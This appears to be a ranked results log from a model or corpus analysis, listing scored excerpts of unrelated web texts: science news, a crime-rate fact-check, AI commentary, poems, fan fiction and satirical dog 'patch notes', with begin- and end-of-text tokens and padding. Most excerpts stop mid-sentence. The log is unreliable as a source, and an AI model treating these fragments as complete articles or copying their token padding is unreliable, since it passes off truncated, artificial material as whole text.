daydreaming is anything but a waste of time. + +According to Kaufman and psychologist Rebecca L. McMillan, who co-authored a paper titled "Ode To Positive Constructive Daydreaming," mind-wandering can aid in the process of "creative incubation." And of course, many of us know from experience that our best ideas come seemingly out of the blue when our minds are elsewhere. + +Although daydreaming may seem mindless, a 2012 study suggested it could actually involve a highly engaged brain state -- daydreaming can lead to sudden connections and insights +================================================================================ +Rank = 35; Score = 835584.0 +<|begin_of_text|>In his New York Post column, Ralph Peters defended the controversial Arizona immigration law in part by citing "soaring crime rates in our border states." However, crime rates in Arizona -- as well as crime rates for each state bordering Mexico -- have dropped during the past decade. + +Peters defends AZ law in part by citing "soaring crime rates in our border states" + +From Peters' April 29 New York Post column: + +Our ruling class simply doesn't feel the pain. So the DC elite demonizes Arizona's desperate effort to shove the narco-revolution's disorder back across the border. Murdered ranchers, overwhelmed emergency rooms and soaring crime rates in our border states mean less to the White House than a terrorist detainee's claims of abuse. + +In fact, according to BJS, crime rates in border states have dropped during past decade + +Crime rates in Arizona at lowest point in decades. According to the Bureau of Justice Statistics (BJS), the violent crime rate in Arizona was lower in 2006, 2007, and 2008 -- the most recent year from which data are available -- than any year since 1983. The property crime rate in Arizona was lower in 2006, 2007, and 2008 than any year since 1968. In addition, in Arizona, the violent crime rate dropped from 577.9 per 100,000 population in 1998 to 447 per 100,000 population in 2008; the property crime rate dropped from 5,997 to 4,291 during the same period. During the same decade, Arizona's undocumented immigrant population grew rapidly. The Arizona Republic reported: "Between January 2000 and January 2008, Arizona's undocumented population grew 70 percent, according to the DHS [Department of Homeland Security] report. Nationally, it grew 37 percent." + +Crime rates have dropped during past decade in other border states. The BJS data further show that violent crime rates and property crime rates in California, New Mexico, and Texas dropped from 1998 through 2008 -- the most recent year from which data are available: + +In California, the violent crime rate dropped from 703.7 in 1998 to 503.8 in 2008; the property crime rate dropped from 3,639.1 to 2,940.3 during the same period. + +In New Mexico, the violent crime rate dropped from 961.4 in 1998 to 649.9 in 200 +================================================================================ +Rank = 36; Score = 819200.0 +<|begin_of_text|>Back in 2013, Google and NASA went halvsies on a D-Wave X2 computing system. The D-Wave is supposedly the world's first functional quantum computer, though experts both within and without the company have never been able to conclusively prove that the machine actually taps into the quantum realm to produce its calculations. That is, until now. + +Google's announcement Wednesday centers on "quantum annealing", a technique that determines the global minimum for a given function when presented with a set of potential solutions. In English, it figures out the best (ie most efficient) overall course of action to complete a task when given a set number of options. Scientists have been working on quantum annealers for a while now, though the two primary techniques, "simulated annealing" and "quantum monte carlo" are both just simulated systems running on conventional hardware. The D-Wave system, on the other hand, is hard-coded to run the quantum annealing algorithm on its quantum array. + +The company recently tested the new QA algorithm in a proof-of-concept trial against conventional systems running the simulated annealing and monte carlo methods. The results are more than impressive. As you can see from the graph above, Google's method beat out the other two quite handily, solving a function with 1000 binary variables up to 100 million times faster. + +Google qualified these results as "intriguing and very encouraging" in its announcement, though the company has a long way to go before this research is ready for the consumer market. But once it is, hoo boy, get ready for a technological revolution. With it, AI researchers may be able to develop smarter, more responsive computer learning systems, NASA could use it to simulate rocket launches (or entire space missions) -- heck even the mundane material sciences could get a boost from this technology.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 37; Score = 811008.0 +<|begin_of_text|>Artificial intelligence is gradually becoming smarter and more human-like. As an exponential technology, it has taken decades of seemingly slow progress to get us to where we are. But now, in only in the last few years we’ve seen some major breakthroughs, and they are accelerating. + +The Game of Artificial Intelligence + +Mapping Patterns for Better Results + +The rise of the machines is something sci-fi writers and movie makers have been depicting for years, but is life now on the cusp of imitating art? According to futurist Gerd Leonhard, the future is already here and we just don’t know it. In his book Technology vs. Humanity: The Coming Clash Between Man and Machine, Leonhard explains that the gradual melding of humans and machines is about to reach a tipping point.“Our world is entering a period of truly transformative change where many of us will be surprised by the scale and pace of developments we simply hadn't anticipated,” writes Leonhard.However, unlike many nihilistic views of modern technology and its continued integration into our lives, Leonhard believes the coming years offer “tremendous” potential. One area that looks set to provide the most potential is artificial intelligence (AI). Currently the peak of computer technology, AI is gradually becoming more intelligent and, in many respects, more human-like. Of course, AI is nothing new. Early efforts to make machines capable of autonomous "thought" started in the 40s, but it's only in the last few years we’ve seen some major breakthroughs.Thanks to the spending power of companies such as Google, Apple, Intel and IBM, AI developers now have a chance to flourish. Indeed, according to CB Insights’ data, 250 private AI companies across various verticals have been purchased by major tech brands since 2012. Google has been the most active, picking up 12 AI operations since 2012 with one of its most notable purchases being DeepMind Technologies. Based in the UK, DeepMind is at the forefront of machine learning, and its system managed to beat the world’s leading Go master (a game considered more complex than chess) back in 2016.On top of its own efforts to advance AI, Google’s “Experiment” is an open platform where coders can submit their own projects across a variety of platforms. Alongside virtual reality and other tech trends, AI experiments are flourishing and that’s opening the doors to some intriguing potential uses of the technology. Perhaps the most famous demonstration of AI’s ability to learn new skills came in +================================================================================ +Rank = 38; Score = 811008.0 +<|begin_of_text|>Sunflowers and other plants bloom in front of the Arkansas State Capitol in Little Rock. (Danny Johnston/AP) + +Plants can't feel pain or hunger like animals, but their cells can communicate stress in a way that's not so different from what animals do, scientists have found. + +The finding, published this week in Nature Communication, shows that plants use a compound — the same compound used as an essential neurotransmitter in animal brains — to create electrical signals that regulate growth when facing drought, viruses or extreme temperatures. + +In other words, this is how plants manage stress without having a central nervous system. + +[Scientists find the single letter in corn’s DNA that spurred its evolution] + +As opposed to animals, which have long lines of nerve cells to shoot messages across an organism, this discovery suggests that there's a cell-to-cell communication in plants that's just intrinsically a part of all plant tissues. + +"Plant cells are not very isolated," said Jose Feijo, a contributor to the study's research team out of Australia and a professor at the University of Maryland. "[The neurotransmitter] is able to shuttle from one cell to another pretty rapidly." + +The discovery may lead to medical applications and technology to make crops more resilient, but it also offers insight into how plants have become what they are today. The researchers theorize that plant cells took the neurotransmitter, called gamma-aminobutyric acid or GABA, and "co-opted it" to be a useful communication tool. + +"Evolution is a tinkering process — it's not really a design," Feijo said. "From an evolutionary standpoint, this makes sense." + +[Can plants hear? In a study, vibrations prompt some to boost their defenses] + +While the compound is exactly the same among plants and animals, the proteins that bind to it are very different within the two kingdoms of life. This means that plants and animals evolved their use of the compound as a messenger separately from one another. + +That poses some important questions for further research: How do more ancient plant species, such as ferns, use this compound? And how did this communication system develop? + +Scientists suggest that those questions could lead to ways to fight off viruses in plants, helping the efforts against food insecurity. It might also reveal why particular plant-derived drugs that rely on the GABA-signaling system, such as sedatives and anti-epileptics, work in humans. + +Read more: + +Scientists are closing in on the ultimate secrets of plant photosynthesis + +Squirrel gets ‘drunk’, causes hundreds of dollars in +================================================================================ +Rank = 39; Score = 806912.0 +<|begin_of_text|>Guest poem by Bill Schechter. + +So who dares criticize Private Equity? + +Who has the temerity to malign Private Enterprise, + +- or suggest that Bain actually was a bane? + +But when it came to trashing Public Education & Unions + +the businessmen were first in line, with their Roundtables, their Councils, their Chambers, their PACS, followed by their Hedge Fund and Equity colleagues, with their phony grassroots groups, their bought education commissioners, their for-profit charters, their testing companies feeding at the public trough, their dollars counting double our votes, + +and the bashing of teachers -- fifteen long years now -- why not? + +Let the mandatory assessments proceed: + +Wasn't it teachers whose voracious greed drove the economy off the Wall St. + +cliff? + +destroyed democracy? + +grade papers? + +You say, no? + +Didn't my kids' teachers deceive us into a war in Iraq?Isn't it their munificent salaries that have enthroned vast inequalities andHaven't their callous lesson plans condemned millions to poverty?Aren't they the ones who refuse to invest or hire, while they calmly sit andIsn't it they who are raking in gads of unprecedented profits?And the Achievement Gap? Didn't millions of uncaring teachers cause it? + +Perhaps one day, the mayor of an American city, let's + +call it Newark, New York, or Boston, or a school committee + +States will have the guts to speak out/say/state/declaim + +that attacks on America's teachers are + +"nauseating" and must stop. + +member, or a town selectman, or the even the President of the Unitedat a press conference, in a meeting, or on Meet The Press, + +Sitting here...waiting.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 40; Score = 774144.0 +<|begin_of_text|>No heart so bold, but now grows cold And almost dead with fear: No eye so dry, but now can cry, And pour out many a tear. Earth's potentates and pow'rful states, Captains and men of might Are quite abasht, their courage dasht At this most dreadful sight. + +Would you have griev'd to have receiv'd through Adam so much good, As had been your for evermore, if he at first had stood? Would you have said, 'We ne'er obey'd nor did thy laws regard; It ill befits with benefits, us, Lord, to so reward? + +Mehr + +Seite 110 Threatnings might it fray, All these, and more, had still surviving been: But all are gone, for Death will have no Nay. Such is this World with all her Pomp and Glory, Such are the men whom worldly eyes admire: Cut down by Time, and now become a Story, That we might after better things aspire. Go boast thy self of what thy heart enjoyes, Vain Man! Wird in 28 Büchern von 1829 bis 2008 erwähnt + +Seite 26 Both sea and land, at His command, Their dead at once surrender: The fire and air constrained are Also their dead to tender. The mighty word of this great Lord Links body and soul together Both of the just, and the unjust, To part no more forever. 19 The same translates, from mortal states To immortality, All that survive, and be alive, I... Wird in 29 Büchern von 1867 bis 2008 erwähnt + +Seite 70 If he had stood, then all his brood had been established In God's true love never to move, nor once awry to tread ; Then all his Race my Father's Grace should have enjoy'd for ever, And wicked Sprites by subtile sleights could them have harmed never. Wird in 44 Büchern von 1828 bis 2008 erwähnt + +Seite 71 Since then to share in his welfare, you could have been content, You may with reason share in his treason, and in the punishment. Hence you were born in state forlorn, with natures so depraved; Death was your due because that you had thus yourselves behaved. "You think, 'If we had been as he, whom God did so betrust, We to our cost would ne'er have lost +================================================================================ +Rank = 41; Score = 770048.0 +<|begin_of_text|>by Thomas R. Wells + +Some countries are assholes. They trample on international norms about human rights, maritime boundaries, climate change conventions, and so on. They repeatedly make and break promises and then complain indignantly and even violently if they are challenged for it. They bully weaker countries shamelessly to get their way, all the while declaring their commitment to the highest ideals of international peace and justice. + +You know the kind of country I'm talking about. The kind that believes in its own moral exceptionalism: Not only does it not feel bound by the ordinary rules; it even demands that other countries acknowledge its moral right to set its interests above their own or the international peace. Take Russia. Its behaviour in Ukraine (and elsewhere in recent years) is classic assholism and is systematic and comprehensive enough to warrant the conclusion that Russia is a true asshole nation. I'm sure you can think of others. + +I + +The term “asshole nation” is inspired by Aaron James's neat little book Assholes: A Theory in which he defines the asshole individual as someone who in interpersonal or cooperative relations, + +1. allows himself to enjoy special advantages and does so systematically; + +2. does this out of an entrenched sense of entitlement; and + +3. is immunized by his sense of entitlement against the complaints of other people. (p.5) + +James' theory is directed at the anti-social behaviour of individuals. It covers much of the same ground that organizational psychologists have mapped as the ‘dark triad' of anti-social personality types – narcissism, Machiavellianism, and sub-clinical psychopathy – which will be unfortunately familiar to most people who have worked in any large organization. But James adds two things. First, his account is a thoroughly moral one: the asshole is morally repugnant because of his fundamental lack of respect for the moral status of those he interacts with: He doesn't register other people as morally real. Second, because James' account starts from the moral requirements of participation in cooperative relations rather than from human psychology it is more general than that produced by organisational psychologists. I believe it can also be helpfully applied to non-human agents, such as countries. + +Just as some individuals seem to think that every day is their birthday and they deserve special consideration from everyone else – and a general exemption from rules intended for the general benefit which happen to be inconvenient to them, like using their phone in the movie theatre or speeding through school zones when they're running late – so some countries seem to think that +================================================================================ +Rank = 42; Score = 757760.0 +<|begin_of_text|>Image: Eneas De Troya + +Common sense is a funny thing. It's here that we as people co-existing within a given society reach unsaid agreements on basic features and interpretations of the world, whether "we" like it or not. It's a very conservative notion for one, arguably acting as a drag force on societal evolution, and one that marginalizes by definition. But it's also in a sense a living history of the present, the contested Wikipedia entry that is a collection of people trying to understand itself through often ugly and dated axioms. It may even be necessary for human reasoning. + +What the hell could this possibly have to do with computer science? Ramon Lopez de Mantaras, director of the Spanish National Research Council's Artificial Intelligence Research Institute, believes that one of the central tasks in creating human-like artificial intelligence is in teaching machines common sense, or something a lot like it. "In the last 30 years, research has focused on weak artificial intelligence—that is to say, in making machines very good at a specific topic—but we have not progressed that much with common sense reasoning," he posited in a recent debate, according to IT Iberia's Anna Solana. General or common sense reasoning, the argument goes, is key to understanding the unanticipated, which is key to real intelligence. + +Like many if not most artificial intelligence researchers, Lopez de Mantaras is dismissive of the "singularity," the highly sketchy notion that at some point in the near future machines will acquire the ability to simulate human brains, opening up a brave new world in which machines and humans can trade places, with all sorts of neat and scary science-fictional outcomes. Part of the problem, he argues, is that the brain is not exclusively an electrical device and additionally involves very analog and poorly modeled chemical processes. The other part is that no one has really figured out how to program common sense. We can teach a computer the axioms of geometry—that, say, two points exist on a line—but not so much those of society. + +Speaking at a conference a couple of years ago in Barcelona, Lopez de Mantaras offered a very clear definition of the common sense problem and its implications. "The dominant model at the present time is the digital computer, though the World Wide Web has recently been proposed as a possible model for artificial intelligence, particularly to solve the main problem faced by artificial intelligence: acquiring commonsense knowledge," he said. "This knowledge is not generally found in books or encyclopedias and yet we all +================================================================================ +Rank = 43; Score = 757760.0 +<|begin_of_text|>Stephen Hawking, who is part machine, wants to stop the rise of the machines. + +From Fast Company: + +Stephen Hawking, who turns 71 today, has joined the board of an international think tank devoted to defending humanity from futuristic threats. The Cambridge Project for Existential Risk is a newly founded organization which researches existential threats to humanity such as extreme climate change, artificial intelligence, biotechnology, artificial life, nanotech, and other emerging technologies. Skype cofounder Jaan Tallinn and Cambridge professors Huw Price and Martin Rees founded the project in late 2012. + +Price and Tallinn collaborated on a speech at the 2012 Sydney Ideas Festival which argued that artificial intelligence has reached a threshold that could lead to an explosion of autonomous machine dominance similar to the rise of Homo sapiens. The Cambridge Project for Existential Risk's stated goal is to establish a research center dedicated to the study of autonomous robot (and other) threats within Cambridge University.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 44; Score = 753664.0 +<|begin_of_text|>While team RWBY meandered through Vale, Weiss felt… jealous. + +Jealousy was not a feeling that someone such as Weiss should feel, she knew that, it was… beneath her to feel that petty. That she shouldn't feel that way just because her partner spent less and less time with her. That she had been replaced. + +I don't get it, Weiss watched Ruby lead Blake into an arcade, I thought we were partners, ergo close friends? It made sense to her. Your partner is the person you are closest to, but I don't feel close to Ruby at all anymore. + +When their first semester had started, Ruby and her were more or less, well, inseparable. Not that Weiss hadn't tried to separate herself from Ruby; it got more than a bit too much for her sometimes having the younger teen constantly trying to interact with her. Looking back at it, as much as Weiss had found Ruby to be annoying it was still nice. It was nice to have someone who genuinely wanted to be your friend and not because of your name. + +Towards the end of the last semester, it felt like that closeness was slowly receding as Ruby spent less and less time with Weiss and more with another one of their teammates; Blake. + +It was little surprise to Weiss that Ruby knew about Blake's… heritage, given the amount of time the two had spent together. What did surprise Weiss was the fact that Blake had stayed with Ruby and Yang over the semester break. No, that's not quite right, it didn't surprise me, it also hurts. Her teammates, no, her friends, spent the break together. Without her. + +Weiss felt alone. + +At first Weiss had assumed she was feeling needy, that she was perhaps being a bit too harsh on Ruby when they studied and that was what was pushing her partner away. During the break, Weiss had made a promise to fix whatever… issue had come up, to reconnect with her partner. + +Yet Weiss felt more alone than ever, her partner was off with Blake, almost entirely ignoring her. I suppose I have been replaced. Weiss let out a sigh. Did I screw up? Was it something I did? + +Or perhaps Blake is just better than me? + +No, that wasn't the case. Weiss knew the answer all too easily; Ruby had a crush on Blake. Ruby could never be considered subtle, so it was obvious why her partner was spending more time with Blake. It didn't change the fact that the declining absence of Ruby was affecting Weiss. +================================================================================ +Rank = 45; Score = 745472.0 +<|begin_of_text|>Autonomous cars can currently perform most of the basic driving tasks, like switching lanes or parking, but avoiding an oncoming vehicle or avoiding an animal on the road is still too complex for most systems. + +That is why Georgia Tech has built two rally trucks, 20 percent the size of normal trucks, to test some of the irregular events that happen on roads. + +See also: Semi-autonomous car hits new record at Indy track + +A team of researchers from the Daniel Guggenheim School of Aerospace Engineering and the School of Interactive Computing worked on the autonomous track, called the AutoRally. + +Reaching a top speed of 20 mph – the equivalent of 90 mph at full size – the team could test multiple events at different speeds. The cars start to learn and adjust to the barriers on the road, learning how to avoid them. + +The AutoRally trucks are fitted with a CPU, GPS, battery, and swarth of cameras and sensors to calculate “up to 2000 possibilities in 50 milliseconds.” The team’s goal is to make the truck react as quickly as a human would to complex situations. + +Autonomous tech still not up to quick reflexes? + +The inability to react to an unfamiliar situation is one of the main reasons people are still unsure about autonomous cars. In a new study from the University of Michigan, public perception of self-driving is still quite bad, with a lot of people cautious or against computers controlling cars — a study in the U.K. produced similar results. + +Georgia Tech already provides all of its research and code online, allowing companies currently testing autonomous cars to try out the system in regular cars. + +Google, the company that has worked the longest on self-driving, has been actively avoiding crashes, at least in public. It reported two crashes in California last month, both of which were caused by human error, though we have seen evidence of the autonomous car causing a crash.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 46; Score = 745472.0 +<|begin_of_text|>-Fixed a bug that caused small dogs to start barking and never stop. + +-Small dogs are no longer supported, and will self-terminate within two months. + +-St. Bernard size increased 100%. + +-St. Bernard's cask will no longer contain brandy. Now contains one of four dipping sauces (ranch dressing, sweet and sour, honey mustard and barbecue). + +-Improved saliva production in certain breeds by as much as 300%. + +-Removed a rare glitch that would cause a dog's head to rotate 360 degrees when looking inquisitively at operator. + +-Dogs now regard vacuum cleaners as friends and will attempt to operate them. + +-Fixed a bug that caused dogs to incorrectly regard fecal matter as food. + +-Fixed an error that caused social interaction between dogs to occur on the wrong end. + +-Fixed an issue where some breeds would grow curly hair, making them appear effeminate and prissy. + +-Improved dog pathfinding, allowing them to better navigate to operators located at higher altitudes or behind complicated obstacles. + +-Dramatically reduced instances of autoerotic behavior in public. + +-Addressed a logic error that caused some dogs to hysterically chomp at bees. + +-Fixed a rare glitch where a dog would regard its own tail as an enemy. + +-Removed an exploit that would allow operators to duplicate their dogs endlessly. + +-Placing a small ball or toy in a dog's open mouth while it is yawning will no longer cause it to shut down. + +-Reduced bloodhound "droopiness" by 25%. + +-Fixed issues of dogs turning hostile when spoken to in a funny or scary voice. + +-Introduced fixes for three common benign situations that would cause a dog to become sexually aroused. + +-Fixed error of dog incompatibility with chocolate cake. Should greatly improve experience of being dog. + +-Fixed a bug that would cause floppy ears to flip over the wrong way, requiring an operator to reset them to their default position. + +-Dogs should no longer drag butts across carpeting in presence of operators. + +-Fixed rendering bug that caused deformed geometry on pug faces. + +-Investigated issue of pit bulls entering rings of screaming men, biting each other to death; confirmed cause as operator error. + +-Fixed vocalization issue in huskies which would cause them to utter "I love you" when trying to say "stop tormenting me." + +-Added a routine to flush loyalty cache of dogs upon death of operators, preventing documented issues of dogs waiting at train stations 